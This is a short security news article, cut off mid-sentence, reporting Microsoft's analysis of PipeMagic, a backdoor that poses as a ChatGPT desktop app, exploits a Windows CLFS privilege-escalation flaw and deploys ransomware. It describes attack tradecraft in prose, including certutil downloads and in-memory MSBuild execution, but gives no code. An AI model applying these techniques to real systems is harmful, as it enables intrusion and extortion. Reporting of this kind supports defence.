PipeMagic Malware Imitates ChatGPT App to Exploit Windows Vulnerability and Deploy Ransomware

The PipeMagic malware, which is credited to the financially motivated threat actor Storm-2460, is a remarkable illustration of how cyber dangers are always changing. It poses as the genuine open-source ChatGPT Desktop Application from GitHub.

This sophisticated modular backdoor facilitates targeted attacks by exploiting CVE-2025-29824, an elevation-of-privilege vulnerability in the Windows Common Log File System (CLFS).

Microsoft Threat Intelligence identified PipeMagic during investigations into attack chains where adversaries used certutil to download a malicious MSBuild file from compromised legitimate websites, leading to in-memory execution of the backdoor.

Once deployed, PipeMagic enables privilege escalation and ransomware deployment across sectors including IT, finance, and real estate in regions like the United States, Europe, South America, and the Middle East.

Enables Zero-Day Exploitation

The malware’s architecture emphasizes flexibility and persistence, dynamically loading payloads via a dedicated networking module for command-and-control (C2) communication over TCP, while employing encrypted inter-process communication through named pipes ...